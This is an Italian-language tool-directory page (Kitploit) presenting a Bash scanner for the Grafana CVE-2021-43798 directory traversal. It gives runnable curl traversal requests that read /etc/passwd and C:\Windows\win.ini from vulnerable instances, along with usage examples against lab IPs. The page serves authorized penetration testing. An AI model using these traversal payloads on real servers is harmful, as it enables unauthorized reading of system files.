Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Grafana-Plugin-Enumerator-CVE-2021-43798 — Scanner basato su Bash che enumera gli ID dei plugin di Grafana e verifica la directory traversal CVE-2021-43798 tentando di leggere /etc/passwd o win.ini su istanze vulnerabili. | Kitploit
Strumenti/GitHubGitHub/squ1shification/grafana-plugin-enumerator-cve-2021-43798
Scanner di VulnerabilitàScanner di Vulnerabilità WebExploitScripting e AutomazioneSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHub
squ1shification/grafana-plugin-enumerator-cve-2021-43798

Grafana-Plugin-Enumerator-CVE-2021-43798

Scanner basato su Bash che enumera gli ID dei plugin di Grafana e verifica la directory traversal CVE-2021-43798 tentando di leggere /etc/passwd o win.ini su istanze vulnerabili.

Vedi Repository
113h 27m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Grafana CVE-2021-43798 Plugin Enumerator

Un piccolo strumento basato su Bash per testare istanze Grafana per CVE-2021-43798, una vulnerabilità di directory traversal che interessa versioni vulnerabili di Grafana.

Lo strumento enumera gli ID dei plugin di Grafana e utilizza curl --path-as-is per verificare se il directory traversal può accedere a un file noto.

Solo per test di sicurezza autorizzati e ambienti di laboratorio.

File

root@kitploit:~
.
├── grafana-windows.sh
├── grafana-linux.sh
├── plugins.txt
└── README.md
  • grafana-windows.sh: Verifica l'accesso a C:\Windows\win.ini
  • grafana-linux.sh: Verifica l'accesso a /etc/passwd
  • plugins.txt: Una wordlist contenente gli ID dei plugin di Grafana utilizzati durante l'enumerazione.

Requisiti

  • Bash
  • curl
  • Un target Grafana
  • Autorizzazione a testare il target

Verifica che curl sia installato:

root@kitploit:~
curl --version

Rendi eseguibili gli script:

root@kitploit:~
chmod +x grafana-windows.sh
chmod +x grafana-linux.sh

Panoramica di CVE-2021-43798

CVE-2021-43798 è una vulnerabilità di directory traversal in Grafana.

L'endpoint vulnerabile si basa su: /public/plugins/<plugin-id>/

La vulnerabilità può consentire il traversal al di fuori della directory dei plugin prevista.

La parte importante durante il test con curl è: --path-as-is

Senza questa opzione, il client potrebbe normalizzare il percorso prima di inviarlo al server.

Scanner Windows

Lo scanner Windows tenta di recuperare: C:\Windows\win.ini

Il percorso è rappresentato nella richiesta HTTP come: Windows/win.ini

Utilizzo di base

root@kitploit:~
./grafana-windows.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

Esempio:

root@kitploit:~
./grafana-windows.sh -u http://TARGET:3000 -w plugins.txt

Test manuale su Windows

Puoi testare manualmente un plugin con:

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

Per il target di laboratorio:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

Una risposta positiva dovrebbe contenere il contenuto del file INI di Windows.

Scanner Linux

Lo scanner Linux tenta di recuperare: /etc/passwd

Utilizzo di base

root@kitploit:~
./grafana-linux.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

Esempio generico:

root@kitploit:~
./grafana-linux.sh -u http://TARGET:3000 -w plugins.txt

Test manuale su Linux

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

Per il target di laboratorio:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

Una risposta positiva su Linux dovrebbe contenere voci simili a:

root@kitploit:~
root:x:0:0:root:/root:/bin/bash

Opzioni della riga di comando

Entrambi gli scanner utilizzano gli stessi argomenti di base:

  • u, --url : URL di base di Grafana
  • w, --wordlist : Wordlist dei plugin
  • f, --file : File da testare
  • h, --help : Mostra l'aiuto
Scarica lo strumento